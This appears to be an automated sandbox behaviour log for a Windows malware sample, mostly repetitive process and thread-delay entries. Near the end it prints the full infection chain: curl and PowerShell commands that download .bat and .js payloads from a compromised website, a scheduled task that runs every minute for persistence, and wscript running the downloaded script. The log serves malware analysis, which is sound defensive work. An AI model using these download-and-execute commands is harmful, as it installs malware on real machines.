Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3580Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4622Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4346
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2019
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3545
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2400
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3012Thread sleep time: -7378697629483816s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2624Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3720Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6640Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3116Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6056Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4480Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1272Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4480Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2232Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4304Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: powershell.exe, 0000000E.00000002.2260297974.0000027A6871F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllL
Source: curl.exe, 00000002.00000003.1983871776.00000258B0F94000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2056651015.0000023F5B2BD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2898856862.000002AD6F765000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -o Pfx5CcXoK0qm.bat "https://admiralpub.ca/wp-content/uploads/2017/olympiadic.php" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /tr "'C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat' qWQnYbiCKtrx1y2" /sc minute /tn qWQnYbiCKtrx1y2 /mo 1Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn qWQnYbiCKtrx1y2 /fJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.jsJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn qWQnYbiCKtrx1y2 /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn qWQnYbiCKtrx1y2 /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js
Source: unknownProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c curl -o pfx5ccxok0qm.bat "https://admiralpub.ca/wp-content/uploads/2017/olympiadic.php" & schtasks /create /f /tr "'c:\users\user\appdata\local\temp\pfx5ccxok0qm.bat' qwqnybicktrx1y2" /sc minute /tn qwqnybicktrx1y2 /mo 1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -com "iwr -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'c:\users\user\appdata\local\temp\eglg6djoy9k9.js'; schtasks /delete /tn qwqnybicktrx1y2 /f; wscript c:\users\user\appdata\local\temp\eglg6djoy9k9.js"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -com "iwr -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'c:\users\user\appdata\local\temp\eglg6djoy9k9.js'; schtasks /delete /tn qwqnybicktrx1y2 /f; wscript c:\users\user\appdata\local\temp\eglg6djoy9k9.js"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -com "iwr -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'c:\users\user\appdata\local\temp\eglg6djoy9k9.js'; schtasks /delete /tn qwqnybicktrx1y2 /f; wscript c:\users\user\appdata\local\temp\eglg6djoy9k9.js"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -com "iwr -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'c:\users\user\appdata\local\temp\eglg6djoy9k9.js'; schtasks /delete /tn qwqnybicktrx1y2 /f; wscript c:\users\user\appdata\local\temp\eglg6djoy9k9.js"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -com "iwr -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'c:\users\user\appdata\local\temp\eglg6djoy9k9.js'; schtasks /delete /tn qwqnybicktrx1y2 /f; wscript c:\users\user\appdata\local\temp\eglg6djoy9k9.js"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -com "iwr -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'c:\users\user\appdata\local\temp\eglg6djoy9k9.js'; schtasks /delete /tn qwqnybicktrx1y2 /f; wscript c:\users\user\appdata\local\temp\eglg6djoy9k9.js"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
